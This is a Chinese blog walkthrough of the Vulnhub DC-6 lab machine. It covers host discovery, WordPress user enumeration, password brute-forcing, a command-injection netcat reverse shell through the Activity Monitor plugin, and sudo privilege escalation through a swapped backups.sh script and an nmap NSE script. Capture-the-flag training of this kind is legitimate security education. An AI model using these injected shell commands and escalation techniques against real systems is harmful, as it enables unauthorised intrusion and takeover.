Vulnhub初体验-DC-6

DC-6提示:cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

靶机下载链接:

Download: http://www.five86.com/downloads/DC-6.zip

Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip

环境搭建:

DC-6和kali都以NAT模式连网 靶机地址未知

kali地址:192.168.111.133

主机发现:

通过arp(地址解析协议)进行局域网内主机发现,arp是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。此处利用metasploit工具下auxiliary模块,通过arp协议发现内网主机的ip地址为192.168.111.132。

root@kali:~/桌面# msfconsole
msf5 > search arp_sweep
msf5 > use auxiliary/scanner/discovery/arp_sweep
msf5 auxiliary(scanner/discovery/arp_sweep) > show options
msf5 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.111.0-254
msf5 auxiliary(scanner/discovery/arp_sweep) > run

也可以通过nmap扫描存活主机

nmap -sP -T4 192.168.111.0/24

端口扫描:

利用nmap扫描靶机开放的端口

nmap -A -T4 192.168.111.132

靶机开放了22(ssh)、80(http)端口 http服务被重定向到了http://wordy/

WEB服务:

web服务已被重定向到http://wordy/ 可以本地添加域名到主机文件,以此访问对应IP

修改hosts文件:

linux:   vim /etc/hosts
windows: C:\Windows\System32\drivers\etc

WEB指纹信息搜集:

通过观察前端,或者利用wappalyzer(火狐插件),可以发现网站是wordpress搭建的

利用kali工具wpscan对web进行扫描

WPScan是一个扫描WordPress漏洞的黑盒子扫描器,可以获取到wordpress的版本,主题,插件,后台用户以及后台用户密码等。执行过程如下:


wpscan --url http://wordy --enumerate vp --enumerate vt --enumerate t --enumerate u

wordpress版本为5.1.1

扫出了五个用户:

admin
graham
mark
sarah
jens

登录后台

wordpress默认后台:

http://wordy/wp-login.php

先前提示了字典文件:

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

burpsuit爆破

用户名:mark

密码:helpdesk01

插件漏洞利用

登录后台分析后,发现wordpress安装了Activity monitor插件

Activity monitor插件的tools功能页中存在命令执行漏洞

nc反弹shell

靶机:127.0.0.1|nc 192.168.111.133 8100 -e /bin/bash
kali:nc -l -v -p 8100

用python获得完整shell


python -c 'import pty; pty.spawn("/bin/bash")'

查看mark的home目录,在stuff目录下翻到thing-to.do.txt

username:graham

password:GSo7isUM1D4

提权

ssh登录graham账号

sudo -l 查看可执行的操作,发现用户jens可以无密码执行backups.sh

将backups.sh文件内容换成/bin/bash以jens用户去执行操作

sudo -u jens /home/jens/backups.sh

继续sudo -l查看可执行的操作,发现root用户可以无密码执行nmap

通过nmap指令调用自己设定好的脚本如执行/bin/bash。新建一个nmap可执行的脚本 root.nse,输入如下内容并用nmap执行:

echo "os.execute('/bin/sh')" > /tmp/suroot.nse
sudo nmap --script=/tmp/suroot.nse

切换到root目录,查看flag:

评论

  1. swback
    6月前
    2021-3-16 13:50:26

    山东菏泽曹县牛逼666窝里宝备

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
下一篇